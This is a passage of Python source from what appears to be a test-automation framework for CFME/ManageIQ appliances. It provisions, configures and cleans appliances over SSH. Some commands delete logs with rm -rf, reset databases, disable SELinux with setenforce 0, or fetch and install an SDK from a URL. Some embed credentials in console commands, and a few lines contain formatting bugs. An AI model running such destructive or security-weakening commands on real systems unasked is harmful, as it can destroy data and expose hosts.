with self.ssh_client as ssh:
log_callback('Downloading SDK from {}'.format(sdk_url))
result = ssh.run_command(
'wget {url} -O {file} > /root/unzip.out 2>&1'.format(
url=sdk_url, file=filename))
if result.failed:
log_raise(Exception, 'Could not download Netapp SDK: {}'.format(result.output))
log_callback('Extracting SDK ({})'.format(filename))
result = ssh.run_command(
'unzip -o -d /var/www/miq/vmdb/lib/ {}'.format(filename))
if result.failed:
log_raise(Exception, 'Could not extract Netapp SDK: {}'.format(result.output))
path = '/var/www/miq/vmdb/lib/{}/lib/linux-64'.format(foldername)
# Check if we haven't already added this line
if ssh.run_command("grep -F '{}' /etc/default/evm".format(path)).failed:
log_callback('Installing SDK ({})'.format(foldername))
result = ssh.run_command(
'echo "export LD_LIBRARY_PATH=\$LD_LIBRARY_PATH:{}" >> /etc/default/evm'.format(
path))
if result.failed:
log_raise(Exception, 'SDK installation failure ($?={}): {}'
.format(result.rc, result.output))
else:
log_callback("Not needed to install, already done")
log_callback('ldconfig')
ssh.run_command('ldconfig')
log_callback('Modifying YAML configuration')
c_yaml = {'product': {'storage': True}}
self.update_advanced_settings(c_yaml)
# To mark that we installed netapp
ssh.run_command("touch /var/www/miq/vmdb/HAS_NETAPP")
if reboot:
self.reboot(log_callback=log_callback)
else:
log_callback(
'Appliance must be restarted before the netapp functionality can be used.')
clear_property_cache(self, 'is_storage_enabled')
@logger_wrap('Updating appliance UUID: {}')
def update_guid(self, log_callback=None):
guid_gen = 'uuidgen |tee /var/www/miq/vmdb/GUID'
log_callback('Running {} to generate UUID'.format(guid_gen))
with self.ssh_client as ssh:
result = ssh.run_command(guid_gen)
assert result.success, 'Failed to generate UUID'
log_callback('Updated UUID: {}'.format(str(result)))
try:
del self.__dict__['guid'] # invalidate cached_property
except KeyError:
logger.exception('Exception clearing cached_property "guid"')
return str(result).rstrip('\n') # should return UUID from stdout
def wait_for_ssh(self, timeout=600):
"""Waits for appliance SSH connection to be ready
Args:
timeout: Number of seconds to wait until timeout (default ``600``)
"""
wait_for(func=lambda: self.is_ssh_running,
message='appliance.is_ssh_running',
delay=5,
num_sec=timeout)
@property
def _ansible_pod_name(self):
if self.is_pod:
if self.version >= '5.9':
get_ansible_name = ("basename $(oc get pods -lname=ansible "
"-o name --namespace={n})".format(n=self.project))
return str(self.ssh_client.run_command(get_ansible_name, ensure_host=True)).strip()
else:
# ansible stuff lives in the same container with main app in 5.8
return self.container
else:
return None
@property
def is_supervisord_running(self):
output = self.ssh_client.run_command("systemctl status supervisord",
container=self._ansible_pod_name)
return output.success
@property
def is_nginx_running(self):
output = self.ssh_client.run_command("systemctl status nginx",
container=self._ansible_pod_name)
return output.success
@property
def is_rabbitmq_running(self):
output = self.ssh_client.run_command("systemctl status rabbitmq-server",
container=self._ansible_pod_name)
return output.success
@property
def is_embedded_ansible_role_enabled(self):
return self.server_roles.get("embedded_ansible", False)
@property
def is_embedded_ansible_running(self):
return self.is_embedded_ansible_role_enabled and self.is_supervisord_running
def wait_for_embedded_ansible(self, timeout=900):
"""Waits for embedded ansible to be ready
Args:
timeout: Number of seconds to wait until timeout (default ``900``)
"""
wait_for(
func=lambda: self.is_embedded_ansible_running,
message='appliance.is_embedded_ansible_running',
delay=60,
num_sec=timeout
)
@cached_property
def get_host_address(self):
try:
server = self.advanced_settings.get('server')
if server:
return server.get('host')
except Exception as e:
logger.exception(e)
self.log.error('Exception occured while fetching host address')
def wait_for_host_address(self):
try:
wait_for(func=lambda: getattr(self, 'get_host_address'),
fail_condition=None,
delay=5,
num_sec=120)
return self.get_host_address
except Exception as e:
logger.exception(e)
self.log.error('waiting for host address from yaml_config timedout')
@property
def is_ssh_running(self):
if self.openshift_creds and 'hostname' in self.openshift_creds:
hostname = self.openshift_creds['hostname']
else:
hostname = self.hostname
return net_check(ports.SSH, hostname, force=True)
@property
def has_cli(self):
return self.ssh_client.run_command('hash appliance_console_cli').success
@property
def is_idle(self):
"""Return appliance idle state measured by last production.log activity.
It runs one liner script, which first gathers current date on appliance and then gathers
date of last entry in production.log(which has to be parsed) with /api calls filtered
(These calls occur every minute.)
Then it deducts that last time in log from current date and if it is lower than idle_time it
returns False else True.
Args:
Returns:
True if appliance is idling for longer or equal to idle_time seconds.
False if appliance is not idling for longer or equal to idle_time seconds.
"""
idle_time = 3600
ssh_output = self.ssh_client.run_command('if [ $((`date "+%s"` - `date -d "$(egrep -v '
'"(Processing by Api::ApiController\#index as JSON|Started GET "/api" for '
'127.0.0.1|Completed 200 OK in)" /var/www/miq/vmdb/log/production.log | tail -1 |cut '
'-d"[" -f3 | cut -d"]" -f1 | cut -d" " -f1)\" \"+%s\"`)) -lt {} ];'
'then echo "False";'
'else echo "True";'
'fi;'.format(idle_time))
return True if 'True' in ssh_output else False
@cached_property
def build_datetime(self):
build_datetime_string = self.build.split('_', 1)[0]
return datetime.strptime(build_datetime_string, '%Y%m%d%H%M%S')
@cached_property
def build_date(self):
return self.build_datetime.date()
def has_netapp(self):
return self.ssh_client.appliance_has_netapp()
@cached_property
def guid(self):
try:
server = self.rest_api.get_entity_by_href(self.rest_api.server_info['server_href'])
return server.guid
except (AttributeError, KeyError, IOError):
self.log.exception('appliance.guid could not be retrieved from REST, falling back')
result = self.ssh_client.run_command('cat /var/www/miq/vmdb/GUID')
return result.output
@cached_property
def evm_id(self):
try:
server = self.rest_api.get_entity_by_href(self.rest_api.server_info['server_href'])
return server.id
except (AttributeError, KeyError, IOError):
self.log.exception('appliance.evm_id could not be retrieved from REST, falling back')
miq_servers = self.db.client['miq_servers']
return self.db.client.session.query(
miq_servers.id).filter(miq_servers.guid == self.guid)[0][0]
@property
def fqdn(self):
"""fqdn from appliance_console
This should likely be 'hostname' as that is what its called on the appliance
Currently hostname attribute holds IP addr
"""
return self.rest_api.get_entity_by_href(self.rest_api.server_info['server_href']).hostname
def get_disabled_regions(self, provider=None):
"""Fetch appliance advanced config, get disabled regions for given provider's type
Only relevant for cloud providers azure and ec2 at the moment
Args:
provider: A BaseProvider object with settings_key attribute
Returns:
Default: Dict of ems_<provider> keys and values of disabled_regions map
when provider given: disabled_regions list from config
when no matching config found: None
"""
ems_config = self.advanced_settings.get('ems')
if provider and ems_config:
try:
prov_config = ems_config.get(getattr(provider, 'settings_key', None), {}) # safe
regions = prov_config['disabled_regions'] # KeyError
except KeyError:
regions = []
elif ems_config:
regions = {ems_key: yaml['disabled_regions']
for ems_key, yaml in ems_config.items()
if 'disabled_regions' in yaml}
else:
# 'ems' was NOT in advanced_settings
regions = {}
return regions
def set_disabled_regions(self, provider, *regions):
"""Modify config to set disabled regions to given regions for the given provider's type
Only relevant for cloud providers azure and ec2 at the moment
Does NOT APPEND to the list of disabled regions, SETS it
Args:
provider: A BaseProvider object with settings_key attribute
*regions: none, one or many region names, on None enables all regions for provider type
Raises:
AssertionError - when the disabled regions don't match after setting
ApplianceException - when there's a KeyError modifying the yaml
"""
try:
yaml_conf = {
'ems': {getattr(provider, 'settings_key', None): {'disabled_regions': regions}}
}
except KeyError:
# catches not-found settings_key or 'None' when the provider doesn't have it
raise ApplianceException('Provider %s settings_key attribute not set '
'or not found in config %s'
.format(provider, yaml_conf['ems']))
self.update_advanced_settings(yaml_conf)
assert self.get_disabled_regions(provider) == list(regions) # its a tuple if empty
@property
def server_roles(self):
"""Return a dictionary of server roles from database"""
asr = self.db.client['assigned_server_roles']
sr = self.db.client['server_roles']
all_role_names = {row[0] for row in self.db.client.session.query(sr.name)}
# Query all active server roles assigned to this server
query = self.db.client.session\
.query(sr.name)\
.join(asr, asr.server_role_id == sr.id)\
.filter(asr.miq_server_id == self.evm_id)\
.filter(asr.active == True) # noqa
active_roles = {row[0] for row in query}
roles = {role_name: role_name in active_roles for role_name in all_role_names}
dead_keys = ['database_owner', 'vdi_inventory']
for key in roles:
if not self.is_storage_enabled:
if key.startswith('storage'):
dead_keys.append(key)
if key == 'vmdb_storage_bridge':
dead_keys.append(key)
for key in dead_keys:
try:
del roles[key]
except KeyError:
pass
return roles
@server_roles.setter
def server_roles(self, roles):
"""Sets the server roles. Requires a dictionary full of the role keys with bool values."""
if self.server_roles == roles:
self.log.debug(' Roles already match, returning...')
return
ansible_old = self.server_roles.get('embedded_ansible', False)
ansible_new = roles.get('embedded_ansible', False)
enabling_ansible = ansible_old is False and ansible_new is True
server_data = self.advanced_settings.get('server', {})
server_data['role'] = ','.join([role for role, boolean in roles.items() if boolean])
self.update_advanced_settings({'server': server_data})
timeout = 600 if enabling_ansible else 300
wait_for(lambda: self.server_roles == roles, num_sec=timeout, delay=15)
if enabling_ansible:
self.wait_for_embedded_ansible()
def enable_embedded_ansible_role(self):
"""Enables embbeded ansible role
This is necessary because server_roles does not wait long enough"""
roles = self.server_roles
roles['embedded_ansible'] = True
try:
self.server_roles = roles
except TimedOutError:
wait_for(lambda: self.server_roles == roles, num_sec=600, delay=15)
self.wait_for_embedded_ansible()
def disable_embedded_ansible_role(self):
"""disables embbeded ansible role"""
roles = self.server_roles
roles['embedded_ansible'] = False
self.server_roles = roles
def update_server_roles(self, changed_roles):
server_roles = self.server_roles.copy()
server_roles.update(changed_roles)
self.server_roles = server_roles
return server_roles == self.server_roles
def server_id(self):
try:
return self.server.sid
except IndexError:
return None
def server_region_string(self):
r = self.server.zone.region.number
return "{} Region: Region {} [{}]".format(
self.product_name, r, r)
@cached_property
def company_name(self):
return self.advanced_settings["server"]["company"]
def host_id(self, hostname):
hosts = list(
self.db.client.session.query(self.db.client["hosts"]).filter(
self.db.client["hosts"].name == hostname
)
)
if hosts:
return str(hosts[0].id)
else:
return None
@cached_property
def is_storage_enabled(self):
return 'storage' in self.advanced_settings.get('product', {})
@property
def advanced_settings(self):
"""Get settings from the base api/settings endpoint for appliance"""
if self.version > '5.9':
return self.rest_api.get(self.rest_api.collections.settings._href)
else:
writeout = self.ssh_client.run_rails_command(
'"File.open(\'/tmp/yam_dump.yaml\', \'w\') '
'{|f| f.write(Settings.to_hash.deep_stringify_keys.to_yaml) }"'
)
if writeout.rc:
logger.error("Config couldn't be found")
logger.error(writeout.output)
raise Exception('Error obtaining config')
base_data = self.ssh_client.run_command('cat /tmp/yam_dump.yaml')
if base_data.rc:
logger.error("Config couldn't be found")
logger.error(base_data.output)
raise Exception('Error obtaining config')
try:
return yaml.load(base_data.output)
except Exception:
logger.debug(base_data.output)
raise
def update_advanced_settings(self, settings_dict):
"""PATCH settings from the master server's api/server/:id/settings endpoint
Uses REST API for CFME 5.9+, uses rails console on lower versions
Will automatically update existing settings dictionary with settings_dict
Args:
data_dict: dictionary of the changes to be made to the yaml configuration
JSON dumps data_dict to pass as raw hash data to rest_api session
Raises:
ApplianceException when server_id isn't set
"""
# Can only modify through server ID, raise if that's not set yet
if self.version < '5.9':
data_dict_base = self.advanced_settings
data_dict_base.update(settings_dict)
temp_yaml = NamedTemporaryFile()
dest_yaml = '/tmp/conf.yaml'
yaml.dump(data_dict_base, temp_yaml, default_flow_style=False)
self.ssh_client.put_file(temp_yaml.name, dest_yaml)
# Build and send ruby script
dest_ruby = '/tmp/set_conf.rb'
ruby_template = data_path.join('utils', 'cfmedb_set_config.rbt')
ruby_replacements = {
'config_file': dest_yaml
}
temp_ruby = load_data_file(ruby_template.strpath, ruby_replacements)
self.ssh_client.put_file(temp_ruby.name, dest_ruby)
# Run it
result = self.ssh_client.run_rails_command(dest_ruby)
if not result:
raise Exception('Unable to set config: {!r}:{!r}'.format(result.rc, result.output))
else:
if self.server_id() is None:
raise ApplianceException('No server id is set, cannot modify yaml config via REST')
self.server.update_advanced_settings(settings_dict)
def set_session_timeout(self, timeout=86400, quiet=True):
"""Sets the timeout of UI timeout.
Args:
timeout: Timeout in seconds
quiet: Whether to ignore any errors
"""
try:
session_config = self.advanced_settings.get('session', {})
if session_config.get('timeout') != timeout:
session_config['timeout'] = timeout
self.update_advanced_settings({'session': session_config})
except Exception as ex:
logger.error('Setting session timeout failed:')
logger.exception(ex)
if not quiet:
raise
def delete_all_providers(self):
logger.info('Destroying all appliance providers')
for prov in self.rest_api.collections.providers:
prov.action.delete()
def reset_automate_model(self):
with self.ssh_client as ssh_client:
ssh_client.run_rake_command("evm:automate:reset")
def clean_appliance(self):
starttime = time()
self.ssh_client.run_command('service evmserverd stop')
self.ssh_client.run_command('sync; sync; echo 3 > /proc/sys/vm/drop_caches')
self.ssh_client.run_command('service collectd stop')
self.ssh_client.run_command('service {}-postgresql restart'.format(
self.db.postgres_version))
self.ssh_client.run_command(
'cd /var/www/miq/vmdb; bin/rake evm:db:reset')
self.ssh_client.run_rake_command('db:seed')
self.ssh_client.run_command('service collectd start')
self.ssh_client.run_command('rm -rf /var/www/miq/vmdb/log/*.log*')
self.ssh_client.run_command('rm -rf /var/www/miq/vmdb/log/apache/*.log*')
self.ssh_client.run_command('service evmserverd start')
self.wait_for_evm_service()
logger.debug('Cleaned appliance in: {}'.format(round(time() - starttime, 2)))
def set_full_refresh_threshold(self, threshold=100):
yaml_data = {'ems_refresh': {'full_refresh_threshold': threshold}}
self.update_advanced_settings(yaml_data)
def set_cap_and_util_all_via_rails(self):
"""Turns on Collect for All Clusters and Collect for all Datastores without using Web UI."""
command = (
'Metric::Targets.perf_capture_always = {:storage=>true, :host_and_cluster=>true};')
self.ssh_client.run_rails_console(command, timeout=None)
def set_cfme_server_relationship(self, vm_name, server_id=1):
"""Set MiqServer record to the id of a VM by name, effectively setting the CFME Server
Relationship without using the Web UI."""
command = ('miq_server = MiqServer.find_by(id: {});'
'miq_server.vm_id = Vm.find_by(name: \'{}\').id;'
'miq_server.save'.format(server_id, vm_name))
self.ssh_client.run_rails_console(command, timeout=None)
def set_pglogical_replication(self, replication_type=':none'):
"""Set pglogical replication type (:none, :remote, :global) without using the Web UI."""
command = ('MiqRegion.replication_type = {}'.format(replication_type))
self.ssh_client.run_rails_console(command, timeout=None)
def add_pglogical_replication_subscription(self, host):
"""Add a pglogical replication subscription without using the Web UI."""
user = conf.credentials['ssh']['username']
password = conf.credentials['ssh']['password']
dbname = 'vmdb_production'
port = 5432
command = ('sub = PglogicalSubscription.new;'
'sub.dbname = \'{}\';'
'sub.host = \'{}\';'
'sub.user = \'{}\';'
'sub.password = \'{}\';'
'sub.port = {};'
'sub.save'.format(dbname, host, user, password, port))
self.ssh_client.run_rails_console(command, timeout=None)
def set_rubyrep_replication(self, host, port=5432, database='vmdb_production',
username='root', password=None):
"""Sets up rubyrep replication via advanced configuration settings yaml."""
password = password or self._encrypt_string(conf.credentials['ssh']['password'])
yaml_data = {'workers': {'worker_base': {'replication_worker': {'replication': {
'destination': {}}}}}
}
dest = yaml_data['workers']['worker_base']['replication_worker']['replication'][
'destination']
dest['database'] = database
dest['username'] = username
dest['password'] = password
dest['port'] = port
dest['host'] = host
logger.debug('Dest: {}'.format(yaml_data))
self.update_advanced_settings(yaml_data)
def wait_for_miq_server_workers_started(self, evm_tail=None, poll_interval=5):
"""Waits for the CFME's workers to be started by tailing evm.log for:
'INFO -- : MIQ(MiqServer#wait_for_started_workers) All workers have been started'
"""
if evm_tail is None:
logger.info('Opening /var/www/miq/vmdb/log/evm.log for tail')
evm_tail = SSHTail('/var/www/miq/vmdb/log/evm.log')
evm_tail.set_initial_file_end()
attempts = 0
detected = False
max_attempts = 60
while (not detected and attempts < max_attempts):
logger.debug('Attempting to detect MIQ Server workers started: {}'.format(attempts))
for line in evm_tail:
if 'MiqServer#wait_for_started_workers' in line:
if ('All workers have been started' in line):
logger.info('Detected MIQ Server is ready.')
detected = True
break
sleep(poll_interval) # Allow more log lines to accumulate
attempts += 1
if not (attempts < max_attempts):
logger.error('Could not detect MIQ Server workers started in {}s.'.format(
poll_interval * max_attempts))
evm_tail.close()
@logger_wrap("Setting dev branch: {}")
def use_dev_branch(self, repo, branch, log_callback=None):
"""Sets up an exitsing appliance to change the branch to specified one and reset it.
Args:
repo: URL to the repo
branch: Branch of that repo
"""
with self.ssh_client as ssh_client:
dev_branch_cmd = 'cd /var/www/miq/vmdb; git remote add dev_branch {}'.format(repo)
if not ssh_client.run_command(dev_branch_cmd):
ssh_client.run_command('cd /var/www/miq/vmdb; git remote remove dev_branch')
if not ssh_client.run_command(dev_branch_cmd):
raise Exception('Could not add the dev_branch remote')
# We now have the repo and now let's update it
ssh_client.run_command('cd /var/www/miq/vmdb; git remote update')
self.evmserverd.stop()
ssh_client.run_command(
'cd /var/www/miq/vmdb; git checkout dev_branch/{}'.format(branch))
ssh_client.run_command('cd /var/www/miq/vmdb; bin/update')
self.start_evm_service()
self.wait_for_evm_service()
self.wait_for_web_ui()
def check_domain_enabled(self, domain):
namespaces = self.db.client["miq_ae_namespaces"]
q = self.db.client.session.query(namespaces).filter(
namespaces.parent_id == None, namespaces.name == domain) # NOQA (for is/==)
try:
return list(q)[0].enabled
except IndexError:
raise KeyError("No such Domain: {}".format(domain))
@logger_wrap('Configuring openldap external auth provider')
def configure_openldap(self, auth_provider, log_callback=None):
"""This method changes the /etc/sssd/sssd.conf and /etc/openldap/ldap.conf files to set
up the appliance for an external authentication with OpenLdap.
Apache file configurations are updated, for webui to take effect.
Args:
auth_provider: auth provider object derived from cfme.utils.auth.MIQAuthProvider
"""
# write /etc/hosts entry for ldap hostname TODO DNS
for key in ['ipaddress', 'cert_filename', 'cert_filepath', 'ldap_conf', 'sssd_conf']:
if not auth_provider.get(key): # either not set, or None
raise ValueError('Auth Provider object {} needs attribute {} for external openldap'
.format(auth_provider, key))
self.ssh_client.run_command('echo "{} {}" >> /etc/hosts'
.format(auth_provider.ipaddress, auth_provider.host1))
# place cert from local conf directory on ldap server
self.ssh_client.put_file(local_file=conf_path.join(auth_provider.cert_filename).strpath,
remote_file=auth_provider.cert_filepath)
# configure ldap and sssd with conf file content from yaml
assert self.ssh_client.run_command('echo "{s}" > {c}'
.format(s=auth_provider.ldap_conf,
c=self.CONF_FILES['openldap']))
assert self.ssh_client.run_command('echo "{s}" > {c}'
.format(s=auth_provider.sssd_conf,
c=self.CONF_FILES['sssd']))
assert self.ssh_client.run_command('chown -R root:root {}').format(self.CONF_FILES['sssd'])
assert self.ssh_client.run_command('chmod 600 {}').format(self.CONF_FILES['sssd'])
# copy miq/cfme template files for httpd ext auth config
template_dir = self.CONF_FILES.get('downstream_templates'
if self.is_downstream
else 'upstream_templates')
# pam httpd-auth and httpd remote-user.conf
for conf_file in [self.CONF_FILES['pam_httpd_auth'], self.CONF_FILES['httpd_remote_user']]:
assert self.ssh_client.run_command('cp {t}{c} {c}'.format(t=template_dir, c=conf_file))
# https external-auth conf, template has extra '.erb' suffix
assert self.ssh_client.run_command('cp {t}{c}.erb {c}'
.format(t=template_dir,
c=self.CONF_FILES['httpd_ext_auth']))
assert self.ssh_client.run_command('setenforce 0')
self.sssd.restart()
self.httpd.restart()
self.wait_for_web_ui()
# UI configuration of auth provider type
self.server.authentication.configure(auth_mode='external', auth_provider=auth_provider)
@logger_wrap('Disabling openldap external auth provider')
def disable_openldap(self, log_callback=None):
self.server.authentication.configure_auth()
files_to_remove = [
self.CONF_FILES['sssd'],
self.CONF_FILES['pam_httpd_auth'],
self.CONF_FILES['httpd_ext_auth'],
self.CONF_FILES['httpd_remote_user']
]
for conf_file in files_to_remove:
assert self.ssh_client.run_command('rm -f $(ls {})'.format(conf_file))
self.evmserverd.restart()
self.httpd.restart()
self.wait_for_web_ui()
self.server.authentication.configure_auth(auth_mode='database')
@logger_wrap('Configuring freeipa external auth provider')
def configure_freeipa(self, auth_provider, log_callback=None):
"""Configure appliance UI and backend for freeIPA
Args:
auth_provider: An auth provider class derived from cfme.utils.auth.BaseAuthProvider
Notes:
Completes backend config via appliance_console_cli
Completes UI configuration for external auth mode
"""
if self.is_pod:
# appliance_console_cli fails when calls hostnamectl --host. it seems docker issue
# raise BZ ?
assert str(self.ssh_client.run_command('hostname')).rstrip() == self.fqdn
# First, clear any existing ipa config, runs clean if not configured
self.appliance_console_cli.uninstall_ipa_client()
self.wait_for_web_ui() # httpd restart in uninstall-ipa
# ext auth ipa requires NTP sync
if auth_provider.host1 not in self.server.settings.ntp_servers_values:
self.server.settings.update_ntp_servers({'ntp_server_1': auth_provider.host1})
# backend appliance configuration of ext auth provider
self.appliance_console_cli.configure_ipa(**auth_provider.as_external_value())
# UI configuration of auth provider type
self.server.authentication.configure(auth_mode='external', auth_provider=auth_provider)
# restart httpd
self.httpd.restart()
@logger_wrap('Disabling freeipa external auth provider')
def disable_freeipa(self, log_callback=None):
"""Switch UI back to database authentication, and run --uninstall-ipa on appliance"""
self.appliance_console_cli.uninstall_ipa_client()
self.server.authentication.configure(auth_mode='database')
self.wait_for_web_ui() # httpd restart in uninstall-ipa
@logger_wrap("Configuring VM Console: {}")
def configure_vm_console_cert(self, log_callback=None):
"""This method generates a self signed SSL cert and installs it
in the miq/vmdb/certs dir. This cert will be used by the
HTML 5 VM Console feature. Note evmserverd needs to be restarted
after running this.
"""
log_callback('Installing SSL certificate')
cert = conf.cfme_data['vm_console'].get('cert')
if cert is None:
raise Exception('vm_console:cert does not exist in cfme_data.yaml')
cert_file = os.path.join(cert.install_dir, 'server.cer')
key_file = os.path.join(cert.install_dir, 'server.cer.key')
cert_generator = scripts_path.join('gen_ssl_cert.py').strpath
remote_cert_generator = os.path.join('/usr/bin', 'gen_ssl_cert.py')
# Copy self signed SSL certificate generator to the appliance
# because it needs to get the FQDN for the cert it generates.
self.ssh_client.put_file(cert_generator, remote_cert_generator)
# Generate cert
command = (
'{cert_generator}'
' --C "{country}"'
' --ST "{state}"'
' --L "{city}"'
' --O "{organization}"'
' --OU "{organizational_unit}"'
' --keyFile "{key}"'
' --certFile "{cert}"'
.format(
cert_generator=remote_cert_generator,
country=cert.country,
state=cert.state,
city=cert.city,
organization=cert.organization,
organizational_unit=cert.organizational_unit,
key=key_file,
cert=cert_file,
)
)
result = self.ssh_client.run_command(command)
if not result == 0:
raise Exception(
'Failed to generate self-signed SSL cert on appliance: {}'.format(
result.output
)
)
class Appliance(IPAppliance):
"""Appliance represents an already provisioned cfme appliance vm
**DO NOT INSTANTIATE DIRECTLY - USE :py:meth:`from_provider`**
"""
_default_name = 'EVM'
@property
def ipapp(self):
# For backwards compat
return self
@classmethod
def from_provider(cls, provider_key, vm_name, name=None, **kwargs):
"""Constructor of this Appliance.
Retrieves the IP address of the appliance from the provider and then instantiates it,
adding some extra parameters that are required by this class.
Args:
provider_name: Name of the provider this appliance is running under
vm_name: Name of the VM this appliance is running as
browser_steal: Setting of the browser_steal attribute.
"""
from cfme.utils.providers import get_mgmt
provider = get_mgmt(provider_key)
def is_ip_available():
try:
ip = provider.get_ip_address(vm_name)
if ip is None:
return False
else:
return ip
except AttributeError:
return False
if 'hostname' in kwargs:
hostname = kwargs.pop('hostname')
else:
ec, tc = wait_for(is_ip_available,
delay=5,
num_sec=600)
hostname = str(ec)
appliance = cls(hostname=hostname, **kwargs)
appliance.vm_name = vm_name
appliance.provider = provider
appliance.provider_key = provider_key
appliance.name = name or cls._default_name
return appliance
def _custom_configure(self, **kwargs):
log_callback = kwargs.pop(
"log_callback",
lambda msg: logger.info("Custom configure %s: %s", self.vm_name, msg))
region = kwargs.get('region', 0)
db_address = kwargs.get('db_address')
key_address = kwargs.get('key_address')
db_username = kwargs.get('db_username')
db_password = kwargs.get('ssh_password')
ssh_password = kwargs.get('ssh_password')
db_name = kwargs.get('db_name')
on_openstack = kwargs.pop('on_openstack', False)
if kwargs.get('fix_ntp_clock', True) is True:
self.fix_ntp_clock(log_callback=log_callback)
if self.is_downstream:
# Upstream already has one.
if kwargs.get('db_address') is None:
# This is workaround for appliances to use only one disk for the VMDB
# If they have been provisioned with a second disk in the infra,
# 'self.unpartitioned_disks' should exist and therefore this won't run.
if not self.unpartitioned_disks:
self.db.create_db_lvm()
self.db.enable_internal(
region, key_address, db_password, ssh_password)
else:
self.db.enable_external(
db_address, region, db_name, db_username, db_password)
self.wait_for_web_ui(timeout=1800, log_callback=log_callback)
if kwargs.get('loosen_pgssl', True) is True:
self.db.loosen_pgssl()
name_to_set = kwargs.get('name_to_set')
if name_to_set is not None and name_to_set != self.name:
self.rename(name_to_set)
self.restart_evm_service(log_callback=log_callback)
self.wait_for_web_ui(log_callback=log_callback)
# Set fqdn for openstack appliance
# If hostname is IP or resolvable, try hostname lookup and set it
# Example lookups with self.hostname as IP and self.hostname as resolvable name
# [root@host-192-168-55-85 ~]# host 1.2.3.137
# 137.3.2.1.in-addr.arpa domain name pointer 137.test.miq.com.
# [root@host-192-168-55-85 ~]# host 137.test.miq.com
# 137.test.miq.com has address 1.2.3.137
if on_openstack:
host_out = self.ssh_client.run_command('host {}'.format(self.hostname))
if host_out.success and 'domain name pointer' in host_out.output:
# resolvable and reverse lookup
fqdn = host_out.output.split(' ')[-1].rstrip('.')
elif host_out.success and 'has address' in host_out.output:
# resolvable and address returned
fqdn = self.hostname
else:
# not resolvable, don't set
fqdn = None
if fqdn:
self.appliance_console_cli.set_hostname(fqdn)
@logger_wrap("Configure Appliance: {}")
def configure(self, setup_fleece=False, log_callback=None, **kwargs):
"""Configures appliance - database setup, rename, ntp sync
Utility method to make things easier.
Args:
db_address: Address of external database if set, internal database if ``None``
(default ``None``)
name_to_set: Name to set the appliance name to if not ``None`` (default ``None``)
region: Number to assign to region (default ``0``)
fix_ntp_clock: Fixes appliance time if ``True`` (default ``True``)
loosen_pgssl: Loosens postgres connections if ``True`` (default ``True``)
key_address: Fetch encryption key from this address if set, generate a new key if
``None`` (default ``None``)
"""
log_callback("Configuring appliance {} on {}".format(self.vm_name, self.provider_key))
if kwargs:
with self:
self._custom_configure(**kwargs)
else:
# Defer to the IPAppliance.
super(Appliance, self).configure(log_callback=log_callback)
# And do configure the fleecing if requested
if setup_fleece:
self.configure_fleecing(log_callback=log_callback)
@logger_wrap("Configure fleecing: {}")
def configure_fleecing(self, log_callback=None):
with self(browser_steal=True):
if self.is_on_vsphere:
self.install_vddk(reboot=True, log_callback=log_callback)
self.wait_for_web_ui(log_callback=log_callback)
if self.is_on_rhev:
self.add_rhev_direct_lun_disk()
log_callback('Enabling smart proxy role...')
roles = self.server.settings.server_roles_db
if not roles["smartproxy"]:
self.server.settings.enable_server_roles("smartproxy")
# add provider
log_callback('Setting up provider...')
self.provider.setup()
# credential hosts
log_callback('Credentialing hosts...')
if not RUNNING_UNDER_SPROUT:
from cfme.utils.hosts import setup_providers_hosts_credentials
setup_providers_hosts_credentials(self.provider_key, ignore_errors=True)
# if rhev, set relationship
if self.is_on_rhev:
from cfme.infrastructure.virtual_machines import InfraVm
log_callback('Setting up CFME VM relationship...')
from cfme.common.vm import VM
from cfme.utils.providers import get_crud
vm = VM.factory(self.vm_name, get_crud(self.provider_key))
cfme_rel = InfraVm.CfmeRelationship(vm)
cfme_rel.set_relationship(str(self.server.name), self.server.sid)
def does_vm_exist(self):
return self.provider.does_vm_exist(self.vm_name)
def rename(self, new_name):
"""Changes appliance name
Args:
new_name: Name to set
Note:
Database must be up and running and evm service must be (re)started afterwards
for the name change to take effect.
"""
vmdb_config = {'server': {'name': new_name}}
self.update_advanced_settings(vmdb_config)
self.name = new_name
def destroy(self):
"""Destroys the VM this appliance is running as
"""
if self.is_on_rhev:
# if rhev, try to remove direct_lun just in case it is detach
self.remove_rhev_direct_lun_disk()
self.provider.delete_vm(self.vm_name)
def stop(self):
"""Stops the VM this appliance is running as
"""
self.provider.stop_vm(self.vm_name)
self.provider.wait_vm_stopped(self.vm_name)
def start(self):
"""Starts the VM this appliance is running as
"""
self.provider.start_vm(self.vm_name)
self.provider.wait_vm_running(self.vm_name)
def templatize(self, seal=True):
"""Marks the appliance as a template. Destroys the original VM in the process.
By default it runs the sealing process. If you have done it differently, you can opt out.
Args:
seal: Whether to run the sealing process (making the VM 'universal').
"""
if seal:
if not self.is_running:
self.start()
self.seal_for_templatizing()
self.stop()
else:
if self.is_running:
self.stop()
self.provider.mark_as_template(self.vm_name)
@property
def is_running(self):
return self.provider.is_vm_running(self.vm_name)
@property
def is_on_rhev(self):
from cfme.infrastructure.provider.rhevm import RHEVMProvider
return isinstance(self.provider, RHEVMProvider.mgmt_class)
@property
def is_on_vsphere(self):
from cfme.infrastructure.provider.virtualcenter import VMwareProvider
return isinstance(self.provider, VMwareProvider.mgmt_class)
def add_rhev_direct_lun_disk(self, log_callback=None):
if log_callback is None:
log_callback = logger.info
if not self.is_on_rhev:
log_callback("appliance NOT on rhev, unable to connect direct_lun")
raise ApplianceException("appliance NOT on rhev, unable to connect direct_lun")
log_callback('Adding RHEV direct_lun hook...')
self.wait_for_ssh()
try:
self.provider.connect_direct_lun_to_appliance(self.vm_name, False)
except Exception as e:
log_callback("Appliance {} failed to connect RHEV direct LUN.".format(self.vm_name))
log_callback(str(e))
raise
@logger_wrap("Remove RHEV LUN: {}")
def remove_rhev_direct_lun_disk(self, log_callback=None):
if not self.is_on_rhev:
msg = "appliance {} NOT on rhev, unable to disconnect direct_lun".format(self.vm_name)
log_callback(msg)
raise ApplianceException(msg)
log_callback('Removing RHEV direct_lun hook...')
self.wait_for_ssh()
try:
self.provider.connect_direct_lun_to_appliance(self.vm_name, True)
except Exception as e:
log_callback("Appliance {} failed to connect RHEV direct LUN.".format(self.vm_name))
log_callback(str(e))
raise
def provision_appliance(version=None, vm_name_prefix='cfme', template=None, provider_name=None,
vm_name=None):
"""Provisions fresh, unconfigured appliance of a specific version
Note:
Version must be mapped to template name under ``appliance_provisioning > versions``
in ``cfme_data.yaml``.
If no matching template for given version is found, and trackerbot is set up,
the latest available template of the same stream will be used.
E.g.: if there is no template for 5.5.5.1 but there is 5.5.5.3, it will be used instead.
If both template name and version are specified, template name takes priority.
Args:
version: version of appliance to provision
vm_name_prefix: name prefix to use when deploying the appliance vm
